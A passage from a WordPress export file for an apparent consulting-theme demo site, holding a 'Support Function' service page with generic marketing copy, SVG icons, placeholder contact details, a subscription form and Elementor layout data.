:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1684]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Support Function</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/support-function/</link>
		<pubDate>Tue, 22 Sep 2020 02:54:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=999</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box5-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box5-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h4>How It Works &amp; How We Do It</h4>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h4>Business Planning &amp; Strategy</h4>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home2.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home2-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h5>Services</h5>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h5>Contacts</h5>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home2.jpg" alt="" loading="lazy">								</a>
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-consulting/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>999</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:54:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:54:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[support-function]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"49a9e54","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"110","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"f99cdb9","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"02efcb6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box5.jpg","id":906},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"2ce419a","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"6119ae9","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"61708e5","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"842b3f0","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"6339130","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"306f17a","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"781b565","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fdc54b6","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8335d80","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"8f5e31e","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"e5c28dd","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"080e76c","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Inter","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#4B83FC","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ea3f620","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"16b4e3e","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3893a38","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"29df260","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"348e8e4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b035bd5","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"93ca462","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"899f255","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"72fb2ed","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"ccc4166","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home2.png","id":1485},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"31ae611","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"4d5a916","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #4b83fc;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"bdf1c78","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4a42617","elType":"widget","settings":{"title":"Services","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"d6f9d84","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"1eca910","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"ece40a4","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"e3aefa2","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"18deaa2","elType":"widget","settings":{"text":"Divider","color":"#4B83FC","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"f3267e7","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support 